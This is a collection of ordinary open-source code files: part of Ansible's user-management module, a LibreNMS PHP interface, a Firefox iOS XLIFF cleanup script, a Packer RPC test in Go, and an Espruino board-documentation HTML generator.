cmd = ['defaults', 'read', plist_file, 'HiddenUsersList']
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
# returned value is
# (
# "_userA",
# "_UserB",
# userc
# )
hidden_users = []
for x in out.splitlines()[1:-1]:
try:
x = x.split('"')[1]
except IndexError:
x = x.strip()
hidden_users.append(x)
if self.system:
if self.name not in hidden_users:
cmd = ['defaults', 'write', plist_file, 'HiddenUsersList', '-array-add', self.name]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot user "%s" to hidden user list.' % self.name, err=err, out=out, rc=rc)
return 0
else:
if self.name in hidden_users:
del (hidden_users[hidden_users.index(self.name)])
cmd = ['defaults', 'write', plist_file, 'HiddenUsersList', '-array'] + hidden_users
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot remove user "%s" from hidden user list.' % self.name, err=err, out=out, rc=rc)
return 0
def user_exists(self):
'''Check is SELF.NAME is a known user on the system.'''
cmd = self._get_dscl()
cmd += ['-list', '/Users/%s' % self.name]
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
return rc == 0
def remove_user(self):
'''Delete SELF.NAME. If SELF.FORCE is true, remove its home directory.'''
info = self.user_info()
cmd = self._get_dscl()
cmd += ['-delete', '/Users/%s' % self.name]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot delete user "%s".' % self.name, err=err, out=out, rc=rc)
if self.force:
if os.path.exists(info[5]):
shutil.rmtree(info[5])
out += "Removed %s" % info[5]
return (rc, out, err)
def create_user(self, command_name='dscl'):
cmd = self._get_dscl()
cmd += ['-create', '/Users/%s' % self.name]
(rc, err, out) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot create user "%s".' % self.name, err=err, out=out, rc=rc)
self._make_group_numerical()
if self.uid is None:
self.uid = str(self._get_next_uid(self.system))
# Homedir is not created by default
if self.create_home:
if self.home is None:
self.home = '/Users/%s' % self.name
if not self.module.check_mode:
if not os.path.exists(self.home):
os.makedirs(self.home)
self.chown_homedir(int(self.uid), int(self.group), self.home)
# dscl sets shell to /usr/bin/false when UserShell is not specified
# so set the shell to /bin/bash when the user is not a system user
if not self.system and self.shell is None:
self.shell = '/bin/bash'
for field in self.fields:
if field[0] in self.__dict__ and self.__dict__[field[0]]:
cmd = self._get_dscl()
cmd += ['-create', '/Users/%s' % self.name, field[1], self.__dict__[field[0]]]
(rc, _err, _out) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot add property "%s" to user "%s".' % (field[0], self.name), err=err, out=out, rc=rc)
out += _out
err += _err
if rc != 0:
return (rc, _err, _out)
(rc, _err, _out) = self._change_user_password()
out += _out
err += _err
self._update_system_user()
# here we don't care about change status since it is a creation,
# thus changed is always true.
if self.groups:
(rc, _out, _err, changed) = self._modify_group()
out += _out
err += _err
return (rc, err, out)
def modify_user(self):
changed = None
out = ''
err = ''
if self.group:
self._make_group_numerical()
for field in self.fields:
if field[0] in self.__dict__ and self.__dict__[field[0]]:
current = self._get_user_property(field[1])
if current is None or current != self.__dict__[field[0]]:
cmd = self._get_dscl()
cmd += ['-create', '/Users/%s' % self.name, field[1], self.__dict__[field[0]]]
(rc, _err, _out) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(
msg='Cannot update property "%s" for user "%s".'
% (field[0], self.name), err=err, out=out, rc=rc)
changed = rc
out += _out
err += _err
if self.update_password == 'always' and self.password is not None:
(rc, _err, _out) = self._change_user_password()
out += _out
err += _err
changed = rc
if self.groups:
(rc, _out, _err, _changed) = self._modify_group()
out += _out
err += _err
if _changed is True:
changed = rc
rc = self._update_system_user()
if rc == 0:
changed = rc
return (changed, out, err)
class AIX(User):
"""
This is a AIX User manipulation class.
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'AIX'
distribution = None
SHADOWFILE = '/etc/security/passwd'
def remove_user(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def create_user_useradd(self, command_name='useradd'):
cmd = [self.module.get_bin_path(command_name, True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None and len(self.groups):
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.create_home:
cmd.append('-m')
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
# set password with chpasswd
if self.password is not None:
cmd = []
cmd.append(self.module.get_bin_path('chpasswd', True))
cmd.append('-e')
cmd.append('-c')
self.execute_command(cmd, data="%s:%s" % (self.name, self.password))
return (rc, out, err)
def modify_user_usermod(self):
cmd = [self.module.get_bin_path('usermod', True)]
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
# skip if no changes to be made
if len(cmd) == 1:
(rc, out, err) = (None, '', '')
else:
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
# set password with chpasswd
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd = []
cmd.append(self.module.get_bin_path('chpasswd', True))
cmd.append('-e')
cmd.append('-c')
(rc2, out2, err2) = self.execute_command(cmd, data="%s:%s" % (self.name, self.password))
else:
(rc2, out2, err2) = (None, '', '')
if rc is not None:
return (rc, out + out2, err + err2)
else:
return (rc2, out + out2, err + err2)
class HPUX(User):
"""
This is a HP-UX User manipulation class.
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'HP-UX'
distribution = None
SHADOWFILE = '/etc/shadow'
def create_user(self):
cmd = ['/usr/sam/lbin/useradd.sam']
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None and len(self.groups):
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.password is not None:
cmd.append('-p')
cmd.append(self.password)
if self.create_home:
cmd.append('-m')
else:
cmd.append('-M')
if self.system:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def remove_user(self):
cmd = ['/usr/sam/lbin/userdel.sam']
if self.force:
cmd.append('-F')
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def modify_user(self):
cmd = ['/usr/sam/lbin/usermod.sam']
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set(remove_existing=False)
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
new_groups = groups
if self.append:
new_groups = groups | set(current_groups)
cmd.append(','.join(new_groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
cmd.append('-d')
cmd.append(self.home)
if self.move_home:
cmd.append('-m')
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd.append('-F')
cmd.append('-p')
cmd.append(self.password)
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
def main():
ssh_defaults = dict(
bits=0,
type='rsa',
passphrase=None,
comment='ansible-generated on %s' % socket.gethostname()
)
module = AnsibleModule(
argument_spec=dict(
state=dict(type='str', default='present', choices=['absent', 'present']),
name=dict(type='str', required=True, aliases=['user']),
uid=dict(type='int'),
non_unique=dict(type='bool', default=False),
group=dict(type='str'),
groups=dict(type='list'),
comment=dict(type='str'),
home=dict(type='path'),
shell=dict(type='str'),
password=dict(type='str', no_log=True),
login_class=dict(type='str'),
# following options are specific to macOS
hidden=dict(type='bool'),
# following options are specific to selinux
seuser=dict(type='str'),
# following options are specific to userdel
force=dict(type='bool', default=False),
remove=dict(type='bool', default=False),
# following options are specific to useradd
create_home=dict(type='bool', default=True, aliases=['createhome']),
skeleton=dict(type='str'),
system=dict(type='bool', default=False),
# following options are specific to usermod
move_home=dict(type='bool', default=False),
append=dict(type='bool', default=False),
# following are specific to ssh key generation
generate_ssh_key=dict(type='bool'),
ssh_key_bits=dict(type='int', default=ssh_defaults['bits']),
ssh_key_type=dict(type='str', default=ssh_defaults['type']),
ssh_key_file=dict(type='path'),
ssh_key_comment=dict(type='str', default=ssh_defaults['comment']),
ssh_key_passphrase=dict(type='str', no_log=True),
update_password=dict(type='str', default='always', choices=['always', 'on_create']),
expires=dict(type='float'),
password_lock=dict(type='bool'),
local=dict(type='bool'),
profile=dict(type='str'),
authorization=dict(type='str'),
role=dict(type='str'),
),
supports_check_mode=True
)
user = User(module)
user.check_password_encrypted()
module.debug('User instantiated - platform %s' % user.platform)
if user.distribution:
module.debug('User instantiated - distribution %s' % user.distribution)
rc = None
out = ''
err = ''
result = {}
result['name'] = user.name
result['state'] = user.state
if user.state == 'absent':
if user.user_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = user.remove_user()
if rc != 0:
module.fail_json(name=user.name, msg=err, rc=rc)
result['force'] = user.force
result['remove'] = user.remove
elif user.state == 'present':
if not user.user_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = user.create_user()
if module.check_mode:
result['system'] = user.name
else:
result['system'] = user.system
result['create_home'] = user.create_home
else:
# modify user (note: this function is check mode aware)
(rc, out, err) = user.modify_user()
result['append'] = user.append
result['move_home'] = user.move_home
if rc is not None and rc != 0:
module.fail_json(name=user.name, msg=err, rc=rc)
if user.password is not None:
result['password'] = 'NOT_LOGGING_PASSWORD'
if rc is None:
result['changed'] = False
else:
result['changed'] = True
if out:
result['stdout'] = out
if err:
result['stderr'] = err
if user.user_exists() and user.state == 'present':
info = user.user_info()
if info is False:
result['msg'] = "failed to look up user name: %s" % user.name
result['failed'] = True
result['uid'] = info[2]
result['group'] = info[3]
result['comment'] = info[4]
result['home'] = info[5]
result['shell'] = info[6]
if user.groups is not None:
result['groups'] = user.groups
# handle missing homedirs
info = user.user_info()
if user.home is None:
user.home = info[5]
if not os.path.exists(user.home) and user.create_home:
if not module.check_mode:
user.create_homedir(user.home)
user.chown_homedir(info[2], info[3], user.home)
result['changed'] = True
# deal with ssh key
if user.sshkeygen:
# generate ssh key (note: this function is check mode aware)
(rc, out, err) = user.ssh_key_gen()
if rc is not None and rc != 0:
module.fail_json(name=user.name, msg=err, rc=rc)
if rc == 0:
result['changed'] = True
(rc, out, err) = user.ssh_key_fingerprint()
if rc == 0:
result['ssh_fingerprint'] = out.strip()
else:
result['ssh_fingerprint'] = err.strip()
result['ssh_key_file'] = user.get_ssh_key_path()
result['ssh_public_key'] = user.get_ssh_public_key()
module.exit_json(**result)
# import module snippets
if __name__ == '__main__':
main()
| EvanK/ansible | lib/ansible/modules/system/user.py | Python | gpl-3.0 | 97,224 |
<?php
/**
* WirelessChannelPolling.php
*
* Custom polling interface for Wireless Channel. Type is channel.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* @link http://librenms.org
* @copyright 2021 Janno Schouwenburg
* @author Janno Schouwenburg <handel@janno.com>
*/
namespace LibreNMS\Interfaces\Polling\Sensors;
interface WirelessChannelPolling
{
/**
* Poll Wireless Channel. Type is channel.
* The returned array should be sensor_id => value pairs
*
* @param array $sensors Array of sensors needed to be polled
* @return array of polled data
*/
public function pollWirelessChannel(array $sensors);
}
| nwautomator/librenms | LibreNMS/Interfaces/Polling/Sensors/WirelessChannelPolling.php | PHP | gpl-3.0 | 1,268 |
#!/usr/bin/env python
#
# xliff-cleanup.py <files>
#
# 1. Remove all <file> sections that we do not care about. We only care about the
# the one for our main app and those for our extensions.
#
# 2. Look at all remaining <file> sections and remove those strings that should not
# be localized. Currently that means: CFBundleDisplayName, CFBundleName and
# CFBundleShortVersionString.
#
# 3. Remove all remaining <file> sections that are now have no <trans-unit> nodes
# in their <body> anymore.
#
# Modifies files in place. Makes no backup.
#
import sys
from lxml import etree
NS = {'x':'urn:oasis:names:tc:xliff:document:1.2'}
FILES_TO_KEEP = ('Client/Info.plist',
'Extensions/ShareTo/Info.plist',
'Extensions/SendTo/Info.plist',
'Extensions/Today/Info.plist',
'Extensions/ViewLater/Info.plist')
STRINGS_TO_REMOVE = ('CFBundleDisplayName',
'CFBundleName',
'CFBundleShortVersionString')
if __name__ == "__main__":
for path in sys.argv[1:]:
# Read it in and modify it in memory
with open(path) as fp:
tree = etree.parse(fp)
root = tree.getroot()
# 1. Remove sections we do not care about
for file_node in root.xpath("//x:file", namespaces=NS):
original = file_node.get('original')
if original and original.endswith('Info.plist'):
if file_node.get('original') not in FILES_TO_KEEP:
file_node.getparent().remove(file_node)
# 2. Remove strings we don't want to be translated
for file_node in root.xpath("//x:file", namespaces=NS):
original = file_node.get('original')
if original and original.endswith('Info.plist'):
for trans_unit_node in file_node.xpath("./x:body/x:trans-unit", namespaces=NS):
id = trans_unit_node.get('id')
# TODO we should probably do the exception for SendTo in a nicer way with some kind of whitelist
if id and id in STRINGS_TO_REMOVE and not ((original == "Extensions/SendTo/Info.plist" and id == "CFBundleDisplayName") or (original == "Extensions/ViewLater/Info.plist" and id == "CFBundleDisplayName")):
trans_unit_node.getparent().remove(trans_unit_node)
# 3. Remove empty file sections
for file_node in root.xpath("//x:file", namespaces=NS):
original = file_node.get('original')
if original and original.endswith('Info.plist'):
trans_unit_nodes = file_node.xpath("x:body/x:trans-unit", namespaces=NS)
if len(trans_unit_nodes) == 0:
file_node.getparent().remove(file_node)
# Write it back to the same file
with open(path, "w") as fp:
fp.write(etree.tostring(tree))
| doronkatz/firefox-ios | scripts/xliff-cleanup.py | Python | mpl-2.0 | 2,992 |
package rpc
import (
"cgl.tideland.biz/asserts"
"github.com/mitchellh/packer/packer"
"net/rpc"
"testing"
)
type TestCommand struct {
runArgs []string
runCalled bool
runEnv packer.Environment
}
func (tc *TestCommand) Help() string {
return "bar"
}
func (tc *TestCommand) Run(env packer.Environment, args []string) int {
tc.runCalled = true
tc.runArgs = args
tc.runEnv = env
return 0
}
func (tc *TestCommand) Synopsis() string {
return "foo"
}
func TestRPCCommand(t *testing.T) {
assert := asserts.NewTestingAsserts(t, true)
// Create the command
command := new(TestCommand)
// Start the server
server := rpc.NewServer()
RegisterCommand(server, command)
address := serveSingleConn(server)
// Create the command client over RPC and run some methods to verify
// we get the proper behavior.
client, err := rpc.Dial("tcp", address)
assert.Nil(err, "should be no error")
clientComm := Command(client)
//Test Help
help := clientComm.Help()
assert.Equal(help, "bar", "helps hould be correct")
// Test run
runArgs := []string{"foo", "bar"}
testEnv := &testEnvironment{}
exitCode := clientComm.Run(testEnv, runArgs)
assert.Equal(command.runArgs, runArgs, "Correct args should be sent")
assert.Equal(exitCode, 0, "Exit code should be correct")
assert.NotNil(command.runEnv, "should have an env")
if command.runEnv != nil {
command.runEnv.Ui()
assert.True(testEnv.uiCalled, "UI should be called on env")
}
// Test Synopsis
synopsis := clientComm.Synopsis()
assert.Equal(synopsis, "foo", "Synopsis should be correct")
}
func TestCommand_Implements(t *testing.T) {
assert := asserts.NewTestingAsserts(t, true)
var r packer.Command
c := Command(nil)
assert.Implementor(c, &r, "should be a Builder")
}
| msabramo/packer | packer/rpc/command_test.go | GO | mpl-2.0 | 1,756 |
#!/usr/bin/python
# This file is part of Espruino, a JavaScript interpreter for Microcontrollers
#
# Copyright (C) 2013 Gordon Williams <gw@pur3.co.uk>
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
# ----------------------------------------------------------------------------------------
# Builds HTML documentation from the files in the boards directory
# ----------------------------------------------------------------------------------------
import subprocess;
import re;
import json;
import sys;
import os;
import importlib;
scriptdir = os.path.dirname(os.path.realpath(__file__))
basedir = scriptdir+"/../"
sys.path.append(basedir+"scripts");
sys.path.append(basedir+"boards");
import pinutils;
# -----------------------------------------------------------------------------------------
# Now scan AF file
print "Script location "+scriptdir
embeddable = False
boardname = ""
if len(sys.argv)==3 and sys.argv[2]=="pinout":
embeddable = True
boardname = sys.argv[1]
if len(sys.argv)==2:
boardname = sys.argv[1]
if boardname=="":
print "ERROR..."
print "USAGE: build_board_docs.py BOARD_NAME [pinout]"
print " 'pinout' will output embeddable HTML of just the pinout"
exit(1)
print "BOARD "+boardname
#htmlFilename = sys.argv[2]
htmlFilename = "boards/"+boardname+".html"
print "HTML_FILENAME "+htmlFilename
htmlFile = open(htmlFilename, 'w')
def writeHTML(s): htmlFile.write(s+"\n");
# import the board def
board = importlib.import_module(boardname)
# Call the included board_specific file - it sets up 'pins' and 'fill_gaps'
pins = board.get_pins()
pins = pinutils.append_devices_to_pin_list(pins, board)
#if not embeddable and "link" in board.info and board.info["link"][0].startswith("http://www.espruino.com"):
# writeHTML('<html><head><meta http-equiv="refresh" content="0; url="'+board.info["link"][0]+'"></head><body>Please wait. redirecting...</body></html>');
# exit(0);
# -----------------------------------------------------------------------------------------
functionsOnBoard = [];
for pin in pins:
if pin["name"][0] == 'P':
pin["name"] = pin["name"][1:];
for func in pin["functions"]:
if func in pinutils.CLASSES:
if not pinutils.CLASSES[func] in functionsOnBoard:
functionsOnBoard.append(pinutils.CLASSES[func])
pinmap = {};
if '_pinmap' in board.board:
pinmap = board.board['_pinmap'];
# -----------------------------------------------------------------------------------------
def dump_pin(pin, pinstrip):
if pin in pinmap:
pin = pinmap[pin];
pininfo = pinutils.findpin(pins, pin, False)
not_five_volt = False
# print(json.dumps(pininfo))
if ("csv" in pininfo) and ("IO" in pininfo["csv"]) and ("Type" in pininfo["csv"]) and (pininfo["csv"]["Type"]=="I/O") and (pininfo["csv"]["IO"]!="FT") :
not_five_volt = True
writeHTML(' <DIV class="'+pinstrip+'pin pin">');
pinHTML = ' <SPAN class="pinname">'+pin+"</SPAN>";
pinHTML2 = '';
if not_five_volt:
pinHTML2 += '<SPAN class="pinfunction NOT_5V" title="Not 5v Tolerant">3.3v</SPAN>\n';
if ("_notes" in board.board) and (pin in board.board["_notes"]):
pinHTML2 += '<SPAN class="pinfunction NOTE" title="'+board.board["_notes"][pin]+'">!</SPAN>\n';
reverse = pinstrip=="left" or pinstrip=="right2";
if not reverse: writeHTML(pinHTML+"\n"+pinHTML2)
pinfuncs = {}
for func in sorted(pininfo["functions"]):
# writeHTML(' '+func)
if func in pinutils.CLASSES:
funcdata = str(pininfo["functions"][func])
cls = pinutils.CLASSES[func]
name = cls
title = func
if cls=="I2C" or cls=="SPI" or cls=="USART": name=func.replace("_"," ")
if cls=="DEVICE" and funcdata[:4]=="pin_":
title = title + " ("+funcdata[4:]+")";
# print title
if func in pinutils.NAMES: name = pinutils.NAMES[func]
writeHTML('<!-- '+func+' -->')
if name in pinfuncs:
pinfuncs[name]["title"] = pinfuncs[name]["title"] + " " + title
else:
pinfuncs[name] = { 'cls': cls, 'title': "["+pin+"] "+title, 'name': name, 'id': pin+"_"+func, 'func' : func };
for func in sorted(pinfuncs.items(),key=lambda x: x[1]['cls']):
pf = func[1]
url = False
if pf["cls"] in pinutils.URLS: url = pinutils.URLS[pf["cls"]]
if pf["func"] in pinutils.URLS: url = pinutils.URLS[pf["func"]]
if url != False: writeHTML(' <A href="'+url+'" class="pinfunctionlink">');
writeHTML(' <SPAN class="pinfunction '+pf["cls"]+'" title="'+pf["title"]+'" onMouseOver="showTT(\''+pf["id"]+'\')" onMouseOut="hideTT(\''+pf["id"]+'\')">'+pf["name"]+'</SPAN>')
if url != False: writeHTML(' </A>');
writeHTML(' <SPAN class="pintooltip" id="'+pf["id"]+'" style="display:none;">'+pf["title"]+'</SPAN>')
if reverse: writeHTML(pinHTML2+"\n"+pinHTML)
writeHTML(' </DIV>')
if not embeddable:
writeHTML("""<HTML>
<HEAD>
""");
# Static stylesheet for the pinout diagram; emitted for both standalone and
# embeddable output. The colour classes (.SPI/.ADC/...) correspond to the
# peripheral class assigned to each pin function.
# Fix: CSS has no '#' comment syntax - the note on background-size was a stray
# token in the emitted stylesheet; it is now a proper /* ... */ comment.
writeHTML("""  <STYLE>
    #boardcontainer { position: relative; }
    #board {
      position: absolute;
      background-size: 100% auto; /* width and height, can be %, px or whatever. */
    }
    .pin { padding: 1px; height: 20px; }
    .pinname {
      background-color: #FFF;
      border:1px solid black;
      padding-left: 2px;
      padding-right: 2px;
      font-weight: bold;
    }
    .pinfunction {
      border:1px solid black;
      border-radius:3px;
      padding-left: 2px;
      padding-right: 2px;
    }
    .pinfunctionlink {
      color : black;
      text-decoration: none;
    }
    .pintooltip {
      background-color: #FFD;
      border:1px solid black;
      padding-left: 2px;
      padding-right: 2px;
      font-weight: bold;
      position: absolute;
      z-index: 100;
    }
    .SPI { background-color: #8F8; }
    .ADC { background-color: #88F; }
    .DAC { background-color: #0CC; }
    .PWM { background-color: #8FF; }
    .USART { background-color: #FF8; }
    .CAN { background-color: #8CC; }
    .I2C { background-color: #F88; }
    .DEVICE { background-color: #F8F; }
    .NOT_5V { background-color: #FDD; }
    .NOTE { background-color: #F80; }
    #top { white-space: nowrap; }
    #top2 { white-space: nowrap; }
    #bottom { white-space: nowrap; }
    #bottom2 { white-space: nowrap; }
    #left { text-align:right; }
    #right2 { text-align:right; }
    .toppin {
      -webkit-transform: rotate(-90deg);
      -moz-transform: rotate(-90deg);
      -ms-transform: rotate(-90deg);
      -o-transform: rotate(-90deg);
      transform: rotate(-90deg);
      display: inline-block;
      width: 20px;
    }
    .top2pin {
      -webkit-transform: rotate(90deg);
      -moz-transform: rotate(90deg);
      -ms-transform: rotate(90deg);
      -o-transform: rotate(90deg);
      transform: rotate(90deg);
      display: inline-block;
      width: 20px;
    }
    .bottompin {
      -webkit-transform: rotate(90deg);
      -moz-transform: rotate(90deg);
      -ms-transform: rotate(90deg);
      -o-transform: rotate(90deg);
      transform: rotate(90deg);
      display: inline-block;
      width: 20px;
    }
    .bottom2pin {
      -webkit-transform: rotate(-90deg);
      -moz-transform: rotate(-90deg);
      -ms-transform: rotate(-90deg);
      -o-transform: rotate(-90deg);
      transform: rotate(-90deg);
      display: inline-block;
      width: 20px;
    }
    .line {
      height:2px;background-color:red;position:absolute;
    }
    .line:hover {
      background-color:#FF00FF;
    }
""");
# Emit one absolute-positioning rule per named pin strip on the board
# (entries whose name begins with '_' are metadata, not real strips).
for pinstrip in board.board:
  if pinstrip[0]!='_':
    writeHTML("    #"+pinstrip+" { position: absolute; }")
    writeHTML("    ."+pinstrip+"pin { white-space: nowrap; }")
# Board-specific CSS supplied by the board description file.
writeHTML(board.board_css)
# NOTE(review): jQuery is loaded over plain http - this will be blocked as
# mixed content when the page is served over https; consider an https URL.
writeHTML("  </STYLE>"+'<script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>')
writeHTML("""
<SCRIPT type="text/javascript">
function showTT(ttid) {
var e = document.getElementById(ttid);
e.style.display = 'block';
}
function hideTT(ttid) {
var e = document.getElementById(ttid);
e.style.display = 'none';
}
function drawLine(x1, y1, x2, y2, hover) {
if (x2 < x1) {
var temp = x1;
x1 = x2;
x2 = temp;
temp = y1;
y1 = y2;
y2 = temp;
}
var line = $('<div class="line" alt="'+hover+'"></div>').appendTo($("body"));
var length = Math.sqrt((x1 - x2) * (x1 - x2) + (y1 - y2) * (y1 - y2));
line.css('width', length + "px");
var angle = Math.atan((y2 - y1) / (x2 - x1));
line.css('top', y1 + 0.5 * length * Math.sin(angle) + "px");
line.css('left', x1 - 0.5 * length * (1 - Math.cos(angle)) + "px");
line.css('-moz-transform', "rotate(" + angle + "rad)");
line.css('-webkit-transform', "rotate(" + angle + "rad)");
line.css('-o-transform', "rotate(" + angle + "rad)");
}
</SCRIPT>
""")
# Standalone pages get the document body: board title, external links, a short
# specification table and the legend explaining the pin-function colours.
# Fix: the link anchor used to emit a stray double quote (href="..."") which
# produced invalid HTML.
if not embeddable:
  writeHTML("  </HEAD>")
  writeHTML("  <BODY>")
  writeHTML('  <H1>'+board.info["name"]+'</H1>')
  writeHTML('  <!-- '+boardname+' -->')
  if "link" in board.info:
    for link in board.info["link"]:
      writeHTML('  <P><a href="'+link+'" target="_blank">'+link+'</a></P>')
  writeHTML('  <H2>Specifications</H2>')
  writeHTML('  <TABLE style="margin-left:100px;">')
  writeHTML('    <TR><TH width="256">Chip</TH><TD>'+board.chip['part']+'</TD></TR>')
  writeHTML('    <TR><TH>Package</TH><TD>'+board.chip['package']+'</TD></TR>')
  writeHTML('    <TR><TH>RAM</TH><TD>'+str(board.chip['ram'])+' kBytes</TD></TR>')
  writeHTML('    <TR><TH>Flash</TH><TD>'+str(board.chip['flash'])+' kBytes</TD></TR>')
  writeHTML('    <TR><TH>Speed</TH><TD>'+str(board.chip['speed'])+' Mhz</TD></TR>')
  writeHTML('    <TR><TH>USARTs</TH><TD>'+str(board.chip['usart'])+'</TD></TR>')
  writeHTML('    <TR><TH>SPIs</TH><TD>'+str(board.chip['spi'])+'</TD></TR>')
  writeHTML('    <TR><TH>I2Cs</TH><TD>'+str(board.chip['i2c'])+'</TD></TR>')
  writeHTML('    <TR><TH>USB</TH><TD>'+("Yes" if "USB" in board.devices else "No")+'</TD></TR>')
  writeHTML('    <TR><TH>DACs</TH><TD>'+(str(board.chip['dac']) if board.chip['dac']>0 else "No")+'</TD></TR>')
  writeHTML('    <TR><TH>SD Card</TH><TD>'+("Yes" if "SD" in board.devices else "No")+'</TD></TR>')
  writeHTML('  </TABLE>')
  writeHTML('  <P>Like this? Please tell your friends, blog, or <a href="http://www.espruino.com/Order">support us by buying our board</a>!</P>')
  writeHTML('  <H2>Pinout</H2>')
  # Legend for the colour-coded pin-function boxes; DAC/CAN entries are only
  # shown when the chip actually provides those peripherals.
  writeHTML("""
  <P>Hover the mouse over a pin function for more information. Clicking in a function will tell you how to use it in Espruino.</P>
  <ul>
  <li><span class="pinfunction DEVICE">Purple</span> boxes show pins that are used for other functionality on the board. You should avoid using these unless you know that the marked device is not used.</li>
  <li><span class="pinfunction NOTE">!</span> boxes contain extra information about the pin. Hover your mouse over them to see it.</li>
  <li><span class="pinfunction NOT_5V">3.3v</span> boxes mark pins that are not 5v tolerant (they only take inputs from 0 - 3.3v, not 0 - 5v).</li>
  <li><span class="pinfunction">3.3</span> is a 3.3v output from the on-board Voltage regulator.</li>
  <li><span class="pinfunction">GND</span> is ground (0v).</li>
  <li><span class="pinfunction">VBAT</span> is the battery voltage output (see <a href="/EspruinoBoard">the Espruino Board Reference</a>).</li>
  <li><span class="pinfunction ADC">ADC</span> is an <a href="/ADC">Analog to Digital Converter</a> (for reading analog voltages)</li>""");
  if "DAC" in functionsOnBoard: writeHTML("""  <li><span class="pinfunction DAC">DAC</span> is a <a href="/DAC">Digital to Analog Converter</a> (for creating analog voltages). This is not available on all boards.</li>""")
  writeHTML("""  <li><span class="pinfunction PWM">PWM</span> is for <a href="/PWM">Pulse Width Modulation</a>. This creates analog voltages from a digital output by sending a series of pulses.</li>
  <li><span class="pinfunction SPI">SPI</span> is the 3 wire <a href="/SPI">Serial Peripheral Interface</a>.</li>
  <li><span class="pinfunction USART">USART</span> is a 2 wire peripheral for <a href="/USART">Serial Data</a>.</li>
  <li><span class="pinfunction I2C">I2C</span> is the 2 wire <a href="/I2C">Inter-Integrated Circuit</a> bus.</li>
""");
